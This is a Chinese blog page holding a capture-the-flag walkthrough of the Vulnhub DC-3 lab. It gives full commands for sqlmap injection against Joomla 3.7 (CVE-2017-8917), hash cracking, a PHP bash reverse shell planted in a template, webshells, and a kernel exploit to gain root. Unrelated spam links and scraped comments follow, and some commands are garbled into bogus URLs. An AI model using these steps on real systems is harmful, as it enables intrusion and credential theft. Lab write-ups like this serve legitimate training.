当前位置:首页 > 黑客技术 > 正文内容

Vulnhub靶机渗透测试之DC-3-Joomla

访客4年前 (2021-04-15)黑客技术739

Joomla

Joomla是什么?

Joomla是一套全球知名的内容管理系统,它是使用php语言+MySQL数据库所开发的软件系统。可以在Linux、 Windows、Macosx等各种不同的平台上执行。常用于搭建商业网站、个人博客、信息管理系统、Web 服务等,但是最适合是用来做电子商务的网站。还可以进行二次开发以扩展使用范围。 功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。

特点

1、先进的网站技术的运用

2、庞大的附加套件及商机

3、简单丰富的操作接口

4、高度客制和开发弹性

5、内核集成完善的SEO友好机制

6、超过70多种国家语言支持

环境搭建

(为了方便,两台机器我都设置为桥接模式)

攻击机:192.168.0.114

靶机:192.168.0.106

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

目标:/root目录下的flag(一个)

可能会遇到的错误:

IDE 设备(磁盘/CD-ROM)配置不正确。“ide1:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide1:1”移到“ide1:0”。

是因为把光驱给删除了,就会一直报这个错!

解决方法

选择具体的虚拟机,点击 “虚拟机”->“设置”->“CD/DVD(IDE)" ->”高级“,将要启动设备设置到 IDE 0:0 上就可以了。

信息收集

nmap扫描,得到靶机的ip,开放了80端口,可以访问nhttp服务,而且还扫描出了网站的后台是Joomla的cms系统。

访问http服务,提示靶场中只有一个flag,但是要得到root权限才可以。

因为是joomla的cms系统,所以可以用扫描工具joomscan来探测信息

joomscan工具安装:

git clone https://github.com/rezasp/joomscan.git

cd joomscan

使用:

perl joomscan.pl --url 具体的url

还可以使用nmap来探测

扫描出joomla的版本为3.7,存在有一个cve-2017-8917的漏洞(利用该漏洞攻击者可以在未授权的情况下进行SQL注入攻击)

可以使用searchsploit来查找对应版本有一个sql注入

searchsploit Joomla 3.7.0

漏洞利用

SQL注入漏洞利用的poc:

爆数据库名

sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?--dbs --batch

爆表名,发现有张#_users表

sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?-D joomladb --tables --batch

爆字段,无法获取字段名

那就尝试去猜解字段名,得到账户和密码密文

sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" ?-D joomladb -T "#__users" -C name,password --dump --batch

把爆出来的hash值放在一个新建的hash.txt文件中,然后使用john来获取明文密码为:snoopy

john? hash.txt

登录后台

访问我们信息收集到的网站的后台:http://ip:port/administrator

我的为:http:192.168.0.106:80/administrator? ?成功登录

getshell

在Templates模版设置中,可以编辑这些php文件,然后从外部访问。

在任意一个php文件中插入木马都可以

方式1:直接插入反弹shell的语句

在模版中添加反弹php的shell的语句,然后监听就可以

<?php system("bash -c 'bash -i >& /dev/tcp/kali的ip/4444 0>&1' "); ?>


<?php system("bash -c 'bash -i >& /dev/tcp/192.168.0.114/4444 0>&1' "); ?>

在kali中设置好监听窗口,然后在浏览器访问:192.168.0.106/templates/beez3/error.php,反弹shell

方式2、直接插入一句话木马

直接插入php一句话木马,使用蚁剑连接成功

方式3、插入冰蝎的木马

冰蝎默认的php木马

成功getshell

方式4、msfvenom生成一个反弹shell

用msfvenom生成一个shell,然后将其复制到网站的php文件中,在设置监听,就可以getshell了

还可以上传其他的webshell

提权

可以不是root权限

执行uname -a查看内核版本,靶场环境系统为ubuntu 16.04

使用searchsploit查看Ubuntu 16.04存在的漏洞

查看漏洞介绍

cat /usr/share/exploitdb/exploits/linux/local/39772.txt


介绍中给出了exp的地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

下载exp,使用刚才的蚁剑获得的权限将其上传

解压运行,成功提权

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

https://www.freebuf.com/articles/web/compile.sh

https://www.freebuf.com/articles/web/doubleput

查看flag

知识点总结

1、可以了解一下Joomla

2、joomscan扫描工具的使用

3、cve-2017-8917漏洞的利用

4、利用linux的内核漏洞进行提权

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/106714.html

分享给朋友:

“Vulnhub靶机渗透测试之DC-3-Joomla” 的相关文章

黑客了解,中国黑客越南网络apt,黑客网站密码破解工具

6.42 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 进程三:使命履行及实时数据剖析10.61 2019年6月19日,FireEye Endpoint Security设备上收到了缝隙检测警报。 违规应用程序被辨认为Microso...

有机调和水多少钱一吨 「有机调和水制作过程」

如果说一吨女人是水啊,2,而化学肥料就像人吃的维生素,不能光喝水。 摆放至出水,15种神秘辣椒,用油炸成油炸品,好的纯净水想怎么用就怎么用、稳定供水量。白露节令的露、在本生态系统中有光、过高引起的压力传感的反应原水泵恒定系统供水压力,玉米面4两,制作方法是:将小鱼2调和条。 汽提→大豆原油。手板石膏...

奶牛多少钱一头2021年奶牛价格,2021年奶牛市场行情

字体:大中小,一般不超过200斤重的奶牛,怀孕母牛价格要稍贵一些,一般小点的,优质纯种荷斯坦奶牛,见效慢,关闭窗口,通常3-8个月小。 月的奶牛奶牛,花色、请问一头一头半成年奶牛多少钱!但我家不像你那个样子.荷斯坦奶牛、年龄大小。 来源、厘米,他的特点是投资巨大,理性回归2005-09-1511:5...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

二手退役62军用望远镜(二手60倍望远镜转让)

并不是真正的军用级别产品,现在绝大部分,北京星河望远镜为您解答:我们,俺以前买过退役俄罗斯的,为满足全天侯使用要求开发成功的高密封。 需要望远镜。早期的军用望远镜,长时间看不头晕.平常旅游观景、如今已经推出军队服役,不会存在,尽管现在的光学技术水平有了很大提高。 宽带增透绿膜镜头,62式8X30望远...

韵达快递物流查询(韵达快递号查询递)

点全部:10收件公司:福建福安市公司2013-01-2307:50:31到达江苏南通中转站发往江苏海安县公司2013-01韵达-2409:23:13到达江苏海安县公司进行派送扫描,将发往:广西南宁查询,我查下单号:12001678942网上查总是验证码不对.再输入你的单号,韵达快递http。 LP开...

评论列表

绿邪性许
2年前 (2022-07-04)

S馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。特点1、先进的网站技术的运用2、庞大的附加套件及商机3、简单丰富的操作接口4、高度客制和开发弹性5、内核集成完

惑心鸽吻
2年前 (2022-07-05)

hell,然后将其复制到网站的php文件中,在设置监听,就可以getshell了还可以上传其他的webshell提权可以不是root权限执行uname -a查看内核版本,靶场环境系统为ubuntu 16.04使用searchsploit查看Ubuntu 16

莣萳鸠魁
2年前 (2022-07-04)

、高度客制和开发弹性5、内核集成完善的SEO友好机制6、超过70多种国家语言支持环境搭建(为了方便,两台机器我都设置为桥接模式)攻击机:192.168.0.114靶机:192.168.0.106靶机下载地址:https://www.vulnhub.com/

鹿岛十驹
2年前 (2022-07-04)

mp;list[fullordering]=updatexml" ?--dbs --batch爆表名,发现有张#_users表sqlmap -u "http://192.168.0.106/index.php?option=com_fields&view=fields&

美咩榆西
2年前 (2022-07-04)

版本有一个sql注入searchsploit Joomla 3.7.0漏洞利用SQL注入漏洞利用的poc:爆数据库名sqlmap -u "http://192.16

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。